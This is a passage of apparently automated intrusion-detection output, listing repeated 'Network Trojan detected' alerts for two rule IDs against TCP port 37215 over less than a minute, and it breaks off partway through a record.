          SID:2835222
          Source Port:58832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546730
          SID:2829579
          Source Port:49124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408326
          SID:2829579
          Source Port:33270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273214
          SID:2835222
          Source Port:43152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466015
          SID:2835222
          Source Port:35586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891258
          SID:2829579
          Source Port:39702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598789
          SID:2835222
          Source Port:48038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912498
          SID:2835222
          Source Port:37992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805168
          SID:2829579
          Source Port:37370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401942
          SID:2829579
          Source Port:42892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739231
          SID:2835222
          Source Port:50456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155673
          SID:2835222
          Source Port:54202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040259
          SID:2829579
          Source Port:51794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549667
          SID:2829579
          Source Port:51476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798523
          SID:2829579
          Source Port:36386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551056
          SID:2835222
          Source Port:34414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184163
          SID:2835222
          Source Port:47420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136142
          SID:2835222
          Source Port:45140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670086
          SID:2829579
          Source Port:52902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236802
          SID:2829579
          Source Port:52796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262289
          SID:2829579
          Source Port:45076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746607
          SID:2835222
          Source Port:55360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353091
          SID:2829579
          Source Port:36330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601367
          SID:2829579
          Source Port:51626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746785
          SID:2829579
          Source Port:52132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894664
          SID:2829579
          Source Port:47172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.862645
          SID:2829579
          Source Port:46144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733607
          SID:2835222
          Source Port:39408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238898
          SID:2835222
          Source Port:36956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729969
          SID:2829579
          Source Port:55178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730483
          SID:2835222
          Source Port:58104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135043
          SID:2835222
          Source Port:45924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.747111
          SID:2835222
          Source Port:46492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175871
          SID:2835222
          Source Port:48462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817651
          SID:2829579
          Source Port:58038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857190
          SID:2829579
          Source Port:60814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262805
          SID:2829579
          Source Port:39078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706149
          SID:2835222
          Source Port:33734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274870
          SID:2835222
          Source Port:58560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893478
          SID:2829579
          Source Port:55954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512672
          SID:2835222
          Source Port:55666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356258
          SID:2835222
          Source Port:39382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510319
          SID:2835222
          Source Port:53242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151227
          SID:2829579
          Source Port:40256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818737
          SID:2829579
          Source Port:56104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352656
          SID:2835222
          Source Port:58792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111765
          SID:2829579
          Source Port:46756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857478
          SID:2835222
          Source Port:40890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516805
          SID:2835222
          Source Port:52642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787889
          SID:2835222
          Source Port:38850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158523
          SID:2829579
          Source Port:46014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018973
          SID:2829579
          Source Port:32996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016177
          SID:2835222
          Source Port:46808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352404
          SID:2829579
          Source Port:41468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729771
          SID:2829579
          Source Port:46988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136245
          SID:2829579
          Source Port:58416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671220
          SID:2835222
          Source Port:46070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017693
          SID:2829579
          Source Port:35888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744442
          SID:2829579
          Source Port:44506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155516
          SID:2829579
          Source Port:45524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.801156
          SID:2835222
          Source Port:57072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554760
          SID:2835222
          Source Port:49282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465471
          SID:2829579
          Source Port:33852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446528
          SID:2829579
          Source Port:33818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745694
          SID:2835222
          Source Port:41900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552466
          SID:2829579
          Source Port:39160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272087
          SID:2835222
          Source Port:49750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743648
          SID:2829579
          Source Port:55398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175445
          SID:2829579
          Source Port:35722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269128
          SID:2835222
          Source Port:33562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264633
          SID:2829579
          Source Port:41942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353621
          SID:2835222
          Source Port:37922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672732
          SID:2835222
          Source Port:59742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403143
          SID:2829579
          Source Port:57230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811187
          SID:2829579
          Source Port:50218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465734
          SID:2835222
          Source Port:50052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353077
          SID:2835222
          Source Port:38550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270663
          SID:2829579
          Source Port:48960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808740
          SID:2835222
          Source Port:49780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236664
          SID:2835222
          Source Port:49502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239302
          SID:2835222
          Source Port:48214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888647
          SID:2829579
          Source Port:43158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.804202
          SID:2829579
          Source Port:57148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816446
          SID:2835222
          Source Port:51004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729581
          SID:2829579
          Source Port:36596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071192
          SID:2829579
          Source Port:57526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887535
          SID:2835222
          Source Port:39826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465337
          SID:2835222
          Source Port:49402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174903
          SID:2835222
          Source Port:55612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668253
          SID:2835222
          Source Port:60140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732475
          SID:2829579
          Source Port:37960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444739
          SID:2829579
          Source Port:55926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270017
          SID:2835222
          Source Port:52652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912080
          SID:2835222
          Source Port:57552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855105
          SID:2829579
          Source Port:35774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126992
          SID:2829579
          Source Port:48742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021423
          SID:2835222
          Source Port:59424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601865
          SID:2835222
          Source Port:51010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126616
          SID:2835222
          Source Port:52684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041403
          SID:2835222
          Source Port:37884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158463
          SID:2829579
          Source Port:45226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554575
          SID:2835222
          Source Port:50050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.863010
          SID:2835222
          Source Port:49260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115763
          SID:2829579
          Source Port:57358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461594
          SID:2829579
          Source Port:45376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599870
          SID:2829579
          Source Port:58556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155293
          SID:2835222
          Source Port:56588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671816
          SID:2829579
          Source Port:44730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511149
          SID:2835222
          Source Port:54940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446392
          SID:2829579
          Source Port:42136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270583
          SID:2829579
          Source Port:59370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463503
          SID:2835222
          Source Port:37456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822988
          SID:2829579
          Source Port:50218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166454
          SID:2835222
          Source Port:54732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236848
          SID:2835222
          Source Port:56640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274161
          SID:2835222
          Source Port:46074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822498
          SID:2829579
          Source Port:43416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.902335
          SID:2835222
          Source Port:34038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192523
          SID:2835222
          Source Port:44748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468619
          SID:2835222
          Source Port:36622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911353
          SID:2835222
          Source Port:34798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107279
          SID:2829579
          Source Port:44620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797034
          SID:2829579
          Source Port:45614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237441
          SID:2829579
          Source Port:40592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663678
          SID:2835222
          Source Port:57542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897773
          SID:2835222
          Source Port:41224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175704
          SID:2835222
          Source Port:46784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731366
          SID:2835222
          Source Port:50280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114463
          SID:2835222
          Source Port:44972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016531
          SID:2835222
          Source Port:42428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407300
          SID:2835222
          Source Port:58426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109408
          SID:2835222
          Source Port:33176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266540
          SID:2829579
          Source Port:44092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893585
          SID:2829579
          Source Port:59702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176611
          SID:2829579
          Source Port:54590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403143
          SID:2835222
          Source Port:38542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113130
          SID:2835222
          Source Port:51136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602226
          SID:2835222
          Source Port:38112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355335
          SID:2835222
          Source Port:52348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892473
          SID:2835222
          Source Port:47640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460217
          SID:2835222
          Source Port:37476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709567
          SID:2835222
          Source Port:39618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466963
          SID:2835222
          Source Port:57348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747740
          SID:2835222
          Source Port:45558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160848
          SID:2835222
          Source Port:40634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548812
          SID:2829579
          Source Port:44620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509422
          SID:2829579
          Source Port:35228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.594971
          SID:2829579
          Source Port:52040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797865
          SID:2829579
          Source Port:55584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112290
          SID:2829579
          Source Port:56526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354466
          SID:2835222
          Source Port:53680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108695
          SID:2835222
          Source Port:45372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242374
          SID:2829579
          Source Port:43286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.703955
          SID:2829579
          Source Port:56984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816519
          SID:2835222
          Source Port:50254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174790
          SID:2829579
          Source Port:57704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238470
          SID:2835222
          Source Port:39728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152553
          SID:2835222
          Source Port:44806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706646
          SID:2835222
          Source Port:52118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799897
          SID:2829579
          Source Port:59208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188842
          SID:2829579
          Source Port:49368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704814
          SID:2829579
          Source Port:45896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516742
          SID:2835222
          Source Port:36090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354321
          SID:2835222
          Source Port:59428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551722
          SID:2835222
          Source Port:42942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464871
          SID:2829579
          Source Port:55714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513637
          SID:2829579
          Source Port:53740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788470
          SID:2829579
          Source Port:56258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741339
          SID:2829579
          Source Port:49690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741902
          SID:2835222
          Source Port:59074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806940
          SID:2835222
          Source Port:37714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260567
          SID:2835222
          Source Port:51746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513183
          SID:2835222
          Source Port:33544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180702
          SID:2835222
          Source Port:49236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264309
          SID:2835222
          Source Port:50928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299485
          SID:2829579
          Source Port:54174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730524
          SID:2835222
          Source Port:60794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729572
          SID:2829579
          Source Port:52986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832445
          SID:2835222
          Source Port:47296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355744
          SID:2829579
          Source Port:60134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818829
          SID:2829579
          Source Port:33120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264696
          SID:2835222
          Source Port:44816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747290
          SID:2829579
          Source Port:33766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108769
          SID:2835222
          Source Port:57916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351599
          SID:2835222
          Source Port:44304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160238
          SID:2829579
          Source Port:46436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131712
          SID:2829579
          Source Port:59922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819239
          SID:2829579
          Source Port:45952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789919
          SID:2829579
          Source Port:56990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108874
          SID:2835222
          Source Port:38266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890552
          SID:2835222
          Source Port:41678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136260
          SID:2829579
          Source Port:42540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780297
          SID:2835222
          Source Port:34972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911726
          SID:2835222
          Source Port:57646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495897
          SID:2829579
          Source Port:44820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599559
          SID:2835222
          Source Port:56954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746150
          SID:2829579
          Source Port:55214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734742
          SID:2835222
          Source Port:53622
          Destination Port:37215
